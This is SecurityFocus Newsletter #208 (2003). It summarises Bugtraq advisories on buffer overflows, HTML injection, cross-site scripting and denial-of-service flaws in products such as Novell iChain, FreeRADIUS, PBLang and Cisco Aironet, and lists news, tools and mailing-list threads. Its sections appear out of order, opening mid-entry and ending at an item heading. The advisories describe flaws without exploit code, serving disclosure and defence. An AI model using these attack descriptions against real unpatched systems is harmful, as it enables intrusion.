attributes:
Sparc Solaris 2.6 with patch 107733-10, and without patch 107733-11.
Sparc Solaris 7 with patches 106950-14 through 106950-22, and without patch 106950-23.
Sparc Solaris 8 with patches 109147-07 through 109147-24, and without patch 109147-25.
Sparc Solaris 9 without patch 112963-09.
Intel Solaris 2.6 with patch 107734-10, and without patch 107734-11.
Intel Solaris 7 with patches 106951-14 through 106951-22, and without patch 106951-23.
Intel Solaris 8 with patches 109148-07 through 109148-24, and without patch 109148-25.
Intel Solaris 9 without patch 113986-05.
28. SGI IRIX NSD AUTH_UNIX GID List Privilege Escalation Vulnerability
BugTraq ID: 8304
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8304
Summary:
The IRIX unified nsd (Name Service Daemon) provides a generic interface to
a number of network lookup services including DNS, NIS and LDAP.
SGI has reported a vulnerability in IRIX that may permit attackers to gain
remote root privileges via the nsd server and modules. The problem is a
heap overflow in the RPC AUTH_UNIX functionality of the nsd service.
By submitting a malicious string to the service which typically handles
RPC AUTH_UNIX requests on UDP ports above 1024, it is possible to corrupt
heap memory to execute attacker-supplied instructions. This problem would
allow an attacker to gain access to the vulnerable system with the
privileges of the nsd service.
29. Symantec Quarantine Server Disconnect Denial Of Service Vulnerability
BugTraq ID: 8306
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8306
Summary:
Symantec Quarantine Server is a component of Symantec and Norton AntiVirus
Corporate Edition. The server can be configured to listen on a
user-specified port.
Symantec Quarantine Server (qserver.exe) is prone to a denial of service
vulnerability. This can occur when a user disconnects from the service
before sending any data. This can cause CPU usage for the service to
spike to 100%, potentially denying availability of other resources.
The Quarantine Server must be rebooted for normal functionality to resume.
30. XConq Multiple Environment Variable Buffer Overflow Vulnerabilities
BugTraq ID: 8307
Remote: No
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8307
Summary:
xconq is a multiplayer game that is available for a number of Unix/Linux
variants.
Multiple locally exploitable buffer overflows have been reported in xconq.
This is due to insufficient bounds checking of data supplied via the USER
and DISPLAY environment variables. This may permit a local attacker to
corrupt adjacent regions of stack memory with specific values, allowing
execution of arbitrary code in the context of the program, which is
typically installed setgid 'games'.
This issue appears similar to BID 1495. Further analysis of these issues
may determine that the issues are identical, in which case this BID will
be retired and the earlier BID will be updated.
III. SECURITYFOCUS NEWS AND COMMENTARY
------------------------------------------
1. Fed: Cyberterror fears missed real threat
By Kevin Poulsen
A top U.S. cyber security official says the government was looking for
imagined terrorist hackers, while real terrorists were plotting 9-11.
http://www.securityfocus.com/news/6589
2. Panel Probes the Half-life of Bugs
By Kevin Poulsen
Researchers find that software vulnerabilities have a predictable decay
rate, and the Microsoft RPC hole is currently the most prevalent on the
net.
http://www.securityfocus.com/news/6568
3. UK e-voting pilots deeply flawed
By John Leyden, The Register
A leading British academic has warned of the shortcomings of electronic
voting schemes tried at this year's local elections.
http://www.securityfocus.com/news/6580
4. Yaha usurps Klez
By John Leyden, The Register
Yaha-E displaced Klez as the most common viral menace on the Internet over
the last month, according to Messagelabs.
http://www.securityfocus.com/news/6579
IV. SECURITYFOCUS TOP 6 TOOLS
-----------------------------
1. PeerProtect v0.2
by Poulet Fabrice
Relevant URL:
http://www.atout.be/
Platforms: Linux, POSIX
Summary:
PeerProtect is an addon for Jay's firewall that generates a file which
contains all IP addresses from the RIAA and MPAA, etc. and will protect
peer-to-peer programs from them.
2. DSPAM v2.6.3
by Jonathan A. Zdziarski
Relevant URL:
http://www.networkdweebs.com/software/dspam/
Platforms: UNIX
Summary:
DSPAM is a server-side anti-spam agent for UNIX email servers. It
masquerades as the email server's local delivery agent and filters/learns
SPAM using a Bayesian statistical approach which provides an
administratively maintenance-free, self-learning Anti-Spam service. Each
email is broken down into its most interesting tokens, each assigned a
spam probability. All probabilities are then combined to produce a
statistical probability of spam. This approach, applied to a mature corpus
of email, has the potential to yield a 99.5% success rate with only 0.03%
chance of false positives.
3. pkdump v0.96.2
by dsmoker
Relevant URL:
http://pkdump.sourceforge.net/pkdumpage.html
Platforms: Linux, POSIX
Summary:
pkdump detects TCP and UDP port scans and connection attempts from foreign
hosts over the Internet.
4. Dante v1.1.14
by Inferno Nettverk A/S, info (at) inet (dot) no [email concealed]
Relevant URL:
http://www.inet.no/dante/
Platforms: Digital UNIX/Alpha, IRIX, Linux, OpenBSD, Solaris, SunOS
Summary:
Dante is a free implementation of the proxy protocols socks version 4,
socks version 5 (rfc1928), and msproxy. It can be used as a firewall
between networks. The package consists of two parts, a socks server and a
proxy client which supports socks, msproxy, and HTTP proxies. Commercial
support is available.
5. System Rescue CD v0.2.0
by François Dupoux
Relevant URL:
http://systemrescuecd.sourceforge.net/
Platforms: Linux
Summary:
SystemRescueCd is a Linux system available from a bootable CDROM that
provides an easy way to perform administrative tasks on your computer,
such as creating and editing the partitions of the hard disk or backing up
data. It contains a lot of system utilities (such as parted, qtparted,
partimage, and fstools) and basic utilities (such as editors, midnight
commander, and network tools).
6. FSlint v2.0.2
by pixelbeat
Relevant URL:
http://www.iol.ie/~padraiga/fslint/
Platforms: POSIX, UNIX
Summary:
FSlint is a toolkit to find various forms of lint on a filesystem. At the
moment it reports duplicate files, bad symbolic links, troublesome file
names, empty directories, non-stripped executables, temporary files,
duplicate/conflicting (binary) names, and unused ext2 directory blocks.
V. SECURITY JOBS SUMMARY
------------------------
1. Systems Security Engineer (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331403
2. Looking for a Software Developer or Researcher Position (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331400
3. Technical Operations Manager vacancy (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331405
4. Two security positions, one in PA and one in DC (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331392
5. Network Security Engineer relocating to PA (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331402
6. Security Engineer position - Montgomery, AL (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331409
7. Question about opportunities for Americans outside the US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331395
8. Installation & Support Technician (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331397
9. Ethical Hacker Needed -- Chicago (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331393
10. Security Software Sales opportunity- Federal (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331398
11. Security Software Sales opportunities- Midwest, Southeast/west (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331394
12. Information Security Architect - Franklin Lakes, NJ, USA (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331396
13. Cisco is looking for a Sr. Microsoft security expert (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331406
14. Sr. IA Engineer to work on program in Wash., DC (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331401
15. IA Program Manger (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331408
16. Full time IT Auditor position in Pittsburgh PA (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331404
17. Seeking Information Security Position in the Washington, DC Metro Area (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331407
18. Seattle - Security Sales (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331399
19. Google: Network Security Engineer (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330989
20. Fulltime Test positions -Northern Va (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330992
21. Symantec's MSS practice looking for security device expert - Alexandria, VA
(Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330988
22. Senior Security Professional seeking post (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330991
23. Senior Security Analyst Opportunity - Alphatech Corporation (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330983
24. IMMEDIATE OPENING - Vulnerability Assessment, Reston, VA (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330990
25. IMMEDIATE OPENING - Sr. IDS Manager, Bethesda, MD (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330984
26. Senior IT Auditor (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330982
27. System Security Analyst (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330997
28. IT Security Auditor (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330981
29. Top Secret Cleared Security Professionals Wanted (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330985
30. Open Positions at LURHQ Corporation (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330980
31. Seeking Information Security Position in the SF Bay Area (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330978
32. Network Security Engineer - Washington, DC (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330977
33. Axexandria, VA - Sr Mgmt Systems Programmer wanted (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330976
34. Security Software Developer available (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330975
VI. INCIDENTS LIST SUMMARY
-------------------------
1. Command Line RPC vulnerability scanner? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331427
2. Scan of TCP 552-554 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331331
3. RPC DCOM exploit (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331327
4. Scans for 17300/tcp starting again (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331293
5. Exploit for Windows RPC may be in the wild! (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331226
6. new worm? or DDoS attack in progress (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331221
7. Importance of outbound traffic filtering (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331222
8. floods through our proxy (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331008
9. Anyone know this tool? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330901
10. email worm? Newsletter, aaa.exe, caraoke ksp.exe (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330715
11. www.google.com reference in directory-traversal attack (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330707
12. New or old PHP worm? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330693
13. Is this enough to identify this by? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330692
14. "access_log?hello" ? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330760
15. First time security issue. (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330688
16. [security-elvandar] "access_log?hello" ? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330691
17. Heavy port 1214 traffic revisited (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330610
18. First Time Security Incident (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330612
19. email worm? Newsletter, aaa.exe, caraoke ksp.exe (fwd) (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330607
20. New worm in Japan? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330606
21. Port 0 packets (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330609
VII. VULN-DEV RESEARCH LIST SUMMARY
----------------------------------
1. Analyze binary for holes (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331364
2. Some help With BOF Exploits Writing. - EAX ?! (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331362
3. Password Cracking Challenge... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331319
4. perl/php connect-back backdoor? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331107
5. VL: Remote Linux Kernel < 2.4.21 DoS in XDR routine. (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331106
6. is it even possible for a worm with dcom vuln? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331103
7. Some help With BOF Exploits Writing. (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331099
8. proces on win2K (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/330711
9. Thanks much! (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/330433
10. Unbreakable Lotus Notes (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/330434
VIII. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. DCOM RPC exploit as a virus/trojan? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331422
2. change NT passwords Kerberos (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331421
3. How to silently deploy DirectX9b? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331419
4. Windows XP "write attributes" permission for Users (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331275
5. IAS as a RADIUS server (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331114
6. HTASploit (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331021
7. ISA Server and Win2k3 standard OS (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/330884
8. SecurityFocus Microsoft Newsletter #147 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/330740
9. monitor folders (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/330728
10. Tracking down a user in a large AD network (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/330724
IX. SUN FOCUS LIST SUMMARY
----------------------------
1. NO NEW POSTS FOR THE WEEK ENDING 08.01.03
X. LINUX FOCUS LIST SUMMARY
---------------------------
1. NO NEW POSTS FOR THE WEEK ENDING 08.01.03
XI. SPONSOR INFORMATION
-----------------------
This Issue is Sponsored by: SPI Dynamics
NEW ALERT:
"How a Hacker Launches a LDAP Injection Attack Step-by-Step"
It's as simple as placing additional LDAP query commands
into a Web form input box giving hackers complete access
to all your backend systems! Firewalls and IDS will not
stop such attacks because LDAP Injections are seen as valid
data.
Download this *FREE* white paper from SPI Dynamics for a
complete guide to protection!
http://www.securityfocus.com/SPIDynamics-sf-news5
------------------------------------------------------------------------
--
Copyright 2010, SecurityFocus
SecurityFocus Newsletter #208
-----------------------------
This Issue is Sponsored by: SPI Dynamics
NEW ALERT:
"How a Hacker Launches a LDAP Injection Attack Step-by-Step"
It's as simple as placing additional LDAP query commands
into a Web form input box giving hackers complete access
to all your backend systems! Firewalls and IDS will not
stop such attacks because LDAP Injections are seen as valid
data.
Download this *FREE* white paper from SPI Dynamics for a
complete guide to protection!
http://www.securityfocus.com/SPIDynamics-sf-news5
------------------------------------------------------------------------
--
I. FRONT AND CENTER
1. Maintaining System Integrity During Forensics
2. Firewall Evolution - Deep Packet Inspection
3. Betting on Malware
II. BUGTRAQ SUMMARY
1. Multiple Novell iChain Buffer Overflow Vulnerabilities
2. Microsoft Outlook Express Script Execution Weakness
3. e107 Website System HTML Injection Vulnerability
4. ManDB Utility Local Buffer Overflow Vulnerability
5. FreeRadius Chap Remote Buffer Overflow Vulnerability
6. University of Minnesota GopherD Do_Command Buffer Overflow...
7. PBLang Bulletin Board System HTML Injection Vulnerability
8. EFSoftware EF Commander FTP Banner Buffer Overflow Vulnerability
9. PBLang Bulletin Board System IMG Tag HTML Injection Vulnerability
10. Cisco Aironet AP1x00 Malformed HTTP GET Denial Of Service...
11. Cisco Aironet Telnet Service User Account Enumeration Weakness
12. Gallery Search Engine Cross-Site Scripting Vulnerability
13. Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
14. MacOS X Third Party Application Screen Effects Password...
15. HP PHNE_27128 Denial Of Service Introduction Vulnerability
16. HP PHNE_26413 Denial Of Service Introduction Vulnerability
17. Softshoe Parse-file Cross-Site Scripting Vulnerability
18. Mini SQL Remote Format String Vulnerability
19. XBlast HOME Environment Variable Buffer Overflow Vulnerability
20. KDE Konqueror HTTP REFERER Authentication Credential Leak...
21. Valve Software Half-Life Client Connection Routine Buffer...
22. Valve Software Half-Life Dedicated Server Malformed Parameter...
23. Valve Software Half-Life Dedicated Server Multiplayer Request...
24. Linux Kernel 2.4 XDR Packet Handler For NFSv3 Remote Denial Of...
25. NetScreen ScreenOS TCP Window Size Remote Denial Of Service...
26. Multiple ManDB Utility Local Buffer Overflow Vulnerabilities
27. Sun Solaris Runtime Linker LD_PRELOAD Local Buffer Overflow...
28. SGI IRIX NSD AUTH_UNIX GID List Privilege Escalation...
29. Symantec Quarantine Server Disconnect Denial Of Service...
30. XConq Multiple Environment Variable Buffer Overflow...
III. SECURITYFOCUS NEWS ARTICLES
1. Fed: Cyberterror fears missed real threat
2. Panel Probes the Half-life of Bugs
3. UK e-voting pilots deeply flawed
4. Yaha usurps Klez
IV. SECURITYFOCUS TOP 6 TOOLS
1. PeerProtect v0.2
2. DSPAM v2.6.3
3. pkdump v0.96.2
4. Dante v1.1.14
5. System Rescue CD v0.2.0
6. FSlint v2.0.2
V. SECURITYJOBS LIST SUMMARY
1. Systems Security Engineer (Thread)
2. Looking for a Software Developer or Researcher Position (Thread)
3. Technical Operations Manager vacancy (Thread)
4. Two security positions, one in PA and one in DC (Thread)
5. Network Security Engineer relocating to PA (Thread)
6. Security Engineer position - Montgomery, AL (Thread)
7. Question about opportunities for Americans outside the US (Thread)
8. Installation & Support Technician (Thread)
9. Ethical Hacker Needed -- Chicago (Thread)
10. Security Software Sales opportunity- Federal (Thread)
11. Security Software Sales opportunities- Midwest, Southeast/west...
12. Information Security Architect - Franklin Lakes, NJ, USA (Thread)
13. Cisco is looking for a Sr. Microsoft security expert (Thread)
14. Sr. IA Engineer to work on program in Wash., DC (Thread)
15. IA Program Manger (Thread)
16. Full time IT Auditor position in Pittsburgh PA (Thread)
17. Seeking Information Security Position in the Washington, DC...
18. Seattle - Security Sales (Thread)
19. Google: Network Security Engineer (Thread)
20. Fulltime Test positions -Northern Va (Thread)
21. Symantec's MSS practice looking for security device expert...
22. Senior Security Professional seeking post (Thread)
23. Senior Security Analyst Opportunity - Alphatech Corporation...
24. IMMEDIATE OPENING - Vulnerability Assessment, Reston, VA (Thread)
25. IMMEDIATE OPENING - Sr. IDS Manager, Bethesda, MD (Thread)
26. Senior IT Auditor (Thread)
27. System Security Analyst (Thread)
28. IT Security Auditor (Thread)
29. Top Secret Cleared Security Professionals Wanted (Thread)
30. Open Positions at LURHQ Corporation (Thread)
31. Seeking Information Security Position in the SF Bay Area (Thread)
32. Network Security Engineer - Washington, DC (Thread)
33. Axexandria, VA - Sr Mgmt Systems Programmer wanted (Thread)
34. Security Software Developer available (Thread)
VI. INCIDENTS LIST SUMMARY
1. Command Line RPC vulnerability scanner? (Thread)
2. Scan of TCP 552-554 (Thread)
3. RPC DCOM exploit (Thread)
4. Scans for 17300/tcp starting again (Thread)
5. Exploit for Windows RPC may be in the wild! (Thread)
6. new worm? or DDoS attack in progress (Thread)
7. Importance of outbound traffic filtering (Thread)
8. floods through our proxy (Thread)
9. Anyone know this tool? (Thread)
10. email worm? Newsletter, aaa.exe, caraoke ksp.exe (Thread)
11. www.google.com reference in directory-traversal attack (Thread)
12. New or old PHP worm? (Thread)
13. Is this enough to identify this by? (Thread)
14. "access_log?hello" ? (Thread)
15. First time security issue. (Thread)
16. [security-elvandar] "access_log?hello" ? (Thread)
17. Heavy port 1214 traffic revisited (Thread)
18. First Time Security Incident (Thread)
19. email worm? Newsletter, aaa.exe, caraoke ksp.exe (fwd) (Thread)
20. New worm in Japan? (Thread)
21. Port 0 packets (Thread)
VII. VULN-DEV RESEARCH LIST SUMMARY
1. Analyze binary for holes (Thread)
2. Some help With BOF Exploits Writing. - EAX ?! (Thread)
3. Password Cracking Challenge... (Thread)
4. perl/php connect-back backdoor? (Thread)
5. VL: Remote Linux Kernel < 2.4.21 DoS in XDR routine. (Thread)
6. is it even possible for a worm with dcom vuln? (Thread)
7. Some help With BOF Exploits Writing. (Thread)
8. proces on win2K (Thread)
9. Thanks much! (Thread)
10. Unbreakable Lotus Notes (Thread)
VIII. MICROSOFT FOCUS LIST SUMMARY
1. DCOM RPC exploit as a virus/trojan? (Thread)
2. change NT passwords Kerberos (Thread)
3. How to silently deploy DirectX9b? (Thread)
4. Windows XP "write attributes" permission for Users (Thread)
5. IAS as a RADIUS server (Thread)
6. HTASploit (Thread)
7. ISA Server and Win2k3 standard OS (Thread)
8. SecurityFocus Microsoft Newsletter #147 (Thread)
9. monitor folders (Thread)
10. Tracking down a user in a large AD network (Thread)
IX. SUN FOCUS LIST SUMMARY
1. NO NEW POSTS FOR THE WEEK ENDING 08.01.03
X. LINUX FOCUS LIST SUMMARY
1. NO NEW POSTS FOR THE WEEK ENDING 08.01.03
XI. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Betting on Malware
By George Smith
DARPA's plan to create a futures market for terrorist activities is dead, but the
concept is a natural for predicting viruses and worms.
http://www.securityfocus.com/columnists/176
2. Maintaining System Integrity During Forensics
By Jamie Morris
This article discusses best practices for maintaining system integrity
during forensic examinations.
http://www.securityfocus.com/infocus/1717
3. Firewall Evolution - Deep Packet Inspection
By Ido Dubrawsky
Deep Packet Inspection can be seen as the integration of Intrusion
Detection (IDS) and Intrusion Prevention (IPS) capabilities with
traditional stateful firewall technology.
http://www.securityfocus.com/infocus/1716
II. BUGTRAQ SUMMARY
-------------------
1. Multiple Novell iChain Buffer Overflow Vulnerabilities
BugTraq ID: 8280
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8280
Summary:
Novell iChain Server is a web-based security product designed to implement
and maintain various network-based access controls.
Novell iChain has been reported prone to multiple buffer overflow
vulnerabilities.
The first issue occurs when a special script is run against login. The
issue is likely due to insufficient bounds checking performed on
user-supplied data. It is reported that this issue may be exploited to
trigger a server ABEND condition.
The second issue occurs when a user login name >= 230 bytes is passed to
the iChain server. It has been reported that if this login fails and email
alerts is enabled in the iChain server, the excessive data will likely
trigger an ABEND condition in the affected software.
It has been reported that both of these conditions may be exploited to
trigger ABEND conditions and deny service to legitimate users.
This BID will be updated as further technical details are disclosed.
2. Microsoft Outlook Express Script Execution Weakness
BugTraq ID: 8281
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8281
Summary:
It has been reported that a weakness may have been re-introduced into
Microsoft Outlook Express. According to the source, the issue described
in Bugtraq ID 3334 had been fixed by Microsoft but appears to have
resurfaced.
The original report (BID 3334) described behavior where script code
included in a message set as type "text/plain" in its content-type header
field would be parsed and executed. A reliable source has indicated that
this condition appears to have returned after being fixed.
This is unsafe behavior as the client should treat all messages of this
type as plain text and not execute any script or render any HTML.
Furthermore, these messages may bypass filters designed to block messages
that contain HTML/script code based on the content-type field.
It should be noted that Symantec has no record of the original issue being
fixed. This record will be updated as more information becomes available.
3. e107 Website System HTML Injection Vulnerability
BugTraq ID: 8279
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8279
Summary:
e107 Website System is a web based content management system implemented
in PHP.
The e107 Website System is prone to an HTML injection vulnerability. This
issue is exposed through the class2.php script. An attacker may exploit
this issue by including hostile HTML and script code in form fields that
support custom tags. This includes areas of the site such as Chatbox and
Forum. This code may be rendered in the web browser of a user who views
these areas of the site. This would occur in the security context of the
site hosting e107.
The attacker-supplied HTML and script code would be able to access
properties of the site, potentially allowing for theft of cookie-based
authentication credentials. An attacker could also exploit this issue to
control how the site is rendered to the user.
4. ManDB Utility Local Buffer Overflow Vulnerability
BugTraq ID: 8278
Remote: No
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8278
Summary:
mandb is a utility that is used to initialize or manually update the index
database caches that are usually maintained by the man utility.
mandb has been reported prone to a local buffer overflow vulnerability.
It has been reported that a local attacker may exploit this issue to
execute arbitrary instructions with elevated privileges. Specifically,
user 'man' privileges.
The issue likely presents itself due to a lack of sufficient bounds
checking performed on user-supplied data. Although unconfirmed, it has
been conjectured that user supplied data copied into an insufficient
reserved memory buffer may overflow the bounds of that buffer and corrupt
saved values that are crucial to program execution flow control.
The attacker may exploit this issue to influence execution flow of the
vulnerable utility and have arbitrary attacker specified instructions
executed inline.
It should be noted that although the mandb utility is installed with
setuid root privileges by default, this issue has been reported to be only
exploitable to attain user 'man' privileges.
Additionally, although this vulnerability has been reported to affect man
version 2.3.19, other version may also be affected.
5. FreeRadius Chap Remote Buffer Overflow Vulnerability
BugTraq ID: 8282
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8282
Summary:
FreeRADIUS is a freely available, open source implementation of the RADIUS
protocol. It is available for the Unix and Linux operating systems.
A problem has been reported in the way FreeRADIUS handles CHAP requests.
Because of this, an attacker may be able to gain unauthorized access to a
system using the vulnerable software.
Specific details about the vulnerability are not currently available. It
is known that the problem in CHAP handling may be exploited to execute
code with the privileges of the FreeRADIUS server, giving the attacker
access to the system at that privilege level.
6. University of Minnesota GopherD Do_Command Buffer Overflow Vulnerability
BugTraq ID: 8283
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8283
Summary:
gopherd is the implementation of the Gopher Protocol Daemon by the
University of Minnesota. It is available for the Unix and Linux platforms.
It has been reported that University of Minnesota gopherd is vulnerable to
a remotely exploitable boundary condition error. This may make it possible
for an attacker to gain unauthorized access to a host using the vulnerable
software.
The problem is in the do_command function of the Gopherd.c file. Due to
insufficient bounds checking on the user-supplied data, it is possible for
an attacker to overwrite sensitive process memory. This could result in
the execution of arbitrary instructions with the privileges of the gopher
daemon process.
7. PBLang Bulletin Board System HTML Injection Vulnerability
BugTraq ID: 8284
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8284
Summary:
PBLang is a bulletin board system implemented in PHP.
PBLang is prone to an HTML injection vulnerability. This issue is exposed
through the docs.php script. An attacker may exploit this issue by
including hostile HTML and script code in posts to the bulletin board.
This is because the script that processes posts does not sufficiently
sanitize user input, allowing attackers to embed HTML and script commands
within the post. This code may be rendered in the web browser of a user
who views these areas of the site. This would occur in the security
context of the site hosting PBLang.
The attacker-supplied HTML and script code would be able to access
properties of the site, potentially allowing for theft of cookie-based
authentication credentials. An attacker could also exploit this issue to
control how the site is rendered to the user.
8. EFSoftware EF Commander FTP Banner Buffer Overflow Vulnerability
BugTraq ID: 8285
Remote: Yes
Date Published: Jul 26 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8285
Summary:
EF Commander is a commercially available FTP client distributed by
EFSoftware. It is available for the Microsoft Windows platform.
A problem with EF Commander could result in the execution of arbitrary
code.
It has been reported that a memory corruption bug exists in EF Commander.
Under some circumstances, when an FTP client connects to a malicious FTP
server it may be possible for the server to exploit a boundary condition
error.
The problem is in the handling of FTP banners in EF Commander. When EF
Commander receives an FTP banner of excessive length, it becomes unstable.
It has been reported that this vulnerability can be reproduced by sending
an FTP banner of 520 or more bytes to a vulnerable client. It is possible
that this vulnerability is an exploitable buffer overflow, and could
result in the execution of attacker-supplied code. Any code executed would
run with the permissions of the user running the EF Commander client.
9. PBLang Bulletin Board System IMG Tag HTML Injection Vulnerability
BugTraq ID: 8286
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8286
Summary:
PBLang is a bulletin board system implemented in PHP.
PBLang is prone to an HTML injection vulnerability. This issue is exposed
through the docs.php script. An attacker may exploit this issue by
including hostile HTML and script code encapsulated in [IMG] tags of posts
to the bulletin board. This is because the script that processes posts
does not sufficiently sanitize user input, allowing attackers to embed
HTML and script commands within [IMG] tags of the post. This code may be
rendered in the web browser of a user who views these areas of the site.
This would occur in the security context of the site hosting PBLang.
The attacker-supplied HTML and script code would be able to access
properties of the site, potentially allowing for theft of cookie-based
authentication credentials. An attacker could also exploit this issue to
control how the site is rendered to the user.
It should be noted that although this vulnerability has been reported to
affect PBLang version 4.56, previous versions are also likely affected.
10. Cisco Aironet AP1x00 Malformed HTTP GET Denial Of Service Vulnerability
BugTraq ID: 8290
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8290
Summary:
The Cisco Aironet AP1x00 is a series of wireless access point devices.
Cisco Aironet AP1x00 series devices are prone to a denial of service
vulnerability upon receipt of a malformed HTTP GET request. This issue
exists in the web administrative interface for affected devices. Such a
request will cause the device to reload. It is possible to cause a
prolonged denial of service by repeatedly sending such requests to an
affected device. This could be exploited to deny availability of a WLAN
that depends on the device.
11. Cisco Aironet Telnet Service User Account Enumeration Weakness
BugTraq ID: 8292
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8292
Summary:
Aironet is the Wireless Access Point solution distributed and maintained
by Cisco.
An information leak has been reported in Cisco Aironet Access Points when
the telnet service has been enabled. This may allow a remote attacker to
gain potentially sensitive information.
The problem is in the response of the telnet daemon. A typical telnet
implementation returns the same failure response to a failed
authentication attempt whether or not the user name exists, so an attacker
learns nothing about which names are valid. When an invalid username is
sent to the Aironet telnet daemon, however, the daemon responds with a
distinct "% Login invalid" message, allowing the attacker to gather a list
of valid user names on the target device.
12. Gallery Search Engine Cross-Site Scripting Vulnerability
BugTraq ID: 8288
Remote: Yes
Date Published: Jul 27 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8288
Summary:
Gallery is a web-based photo album. It is written in PHP and is available
for Linux and Unix variants as well as Microsoft Windows operating
systems.
Gallery is prone to a cross-site scripting vulnerability. This issue is
present in the search engine (search.php) facility provided by the
software. Input supplied to the search engine via URI parameters is not
sufficiently sanitized of HTML or script code before being echoed back to
users, allowing for cross-site scripting attacks.
An attacker could exploit this issue by constructing a malicious link to
the search engine that contains hostile HTML and script code.
Attacker-supplied code could be rendered in the browser of a user who
follows such a link. This would occur in the security context of the site
hosting the vulnerable software.
13. Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
